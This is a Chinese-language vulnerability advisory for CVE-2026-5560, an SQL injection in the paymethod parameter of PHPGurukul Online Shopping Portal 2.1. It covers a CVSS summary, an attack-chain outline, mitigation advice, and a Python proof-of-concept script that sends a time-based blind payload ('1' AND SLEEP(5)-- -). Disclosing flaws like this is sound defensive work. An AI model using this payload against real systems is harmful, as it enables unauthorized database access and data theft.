CVE-2026-5560 CVSS 6.3 中危

CVE-2026-5560 PHPGurukul在线购物门户SQL注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5560

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Online Shopping Portal Project

漏洞概述

PHPGurukul Online Shopping Portal Project 2.1 版本被发现存在SQL注入安全漏洞。该漏洞源于 /payment-method.php 文件中的参数处理器未能正确处理 paymethod 参数。攻击者无需用户交互，仅需低权限即可通过网络远程发起攻击。目前该漏洞利用方式已公开，成功利用可能导致数据库信息泄露、数据被篡改或服务不可用。

技术细节

该漏洞主要影响 PHPGurukul Online Shopping Portal Project 2.1 版本，其根本原因在于 /payment-method.php 文件中的代码存在输入验证缺失问题。在组件 Parameter Handler 处理支付方式请求时，直接接收用户提交的 paymethod 参数并将其拼接到后端 SQL 查询语句中，未使用预编译语句或进行严格的特殊字符转义。这种不安全的编码方式使得攻击者能够向参数中注入恶意的 SQL 代码片段。根据 CVSS 3.1 评分向量，攻击者无需用户交互（UI:N），且只需要低权限（PR:L）即可通过网络（AV:N）发起攻击。攻击者可以利用此漏洞读取数据库中的敏感数据（如用户信息、订单详情），修改或删除数据，甚至在某些条件下执行系统命令，对系统的机密性、完整性和可用性造成严重威胁。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用 PHPGurukul Online Shopping Portal Project 2.1 版本，并定位到 /payment-method.php 接口。

STEP 2

漏洞探测

攻击者向 /payment-method.php 发送带有特殊构造参数的请求，测试 paymethod 参数是否存在 SQL 注入点。

STEP 3

执行攻击

确认漏洞存在后，攻击者在 paymethod 参数中注入恶意 SQL 语句，试图提取数据库结构或敏感数据。

STEP 4

数据窃取或破坏

利用获取的数据库权限，窃取用户信息、管理员凭据，或执行 UPDATE/DELETE 操作破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://target-host/payment-method.php"

# SQL Injection Payload to test vulnerability
# This payload attempts to cause a time delay to confirm blind SQL injection
payload = "1' AND SLEEP(5)-- -"

# Construct the request parameters
params = {
    "paymethod": payload
}

try:
    # Send the GET request
    response = requests.get(target_url, params=params, timeout=10)
    
    # Check if the response time indicates successful injection
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability detected: SQL Injection in 'paymethod' parameter")
    else:
        print("[-] Vulnerability not detected or payload failed")
except Exception as e:
    print(f"Error connecting to target: {e}")

影响范围

PHPGurukul Online Shopping Portal Project 2.1

防御指南

临时缓解措施

建议立即检查并修复 /payment-method.php 文件中对 paymethod 参数的处理逻辑。实施严格的输入验证，过滤特殊字符。如果无法立即升级，建议在Web应用防火墙（WAF）中添加针对该SQL注入攻击特征的规则以阻断恶意请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5560
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5560
3 Details https://www.cvedetails.com/cve/CVE-2026-5560/
4 VulDB https://vuldb.com/cve/CVE-2026-5560
5 Link https://github.com/f1rstb100d/CVE/issues/12
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/782932
8 Link https://vuldb.com/vuln/355330
9 Link https://vuldb.com/vuln/355330/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表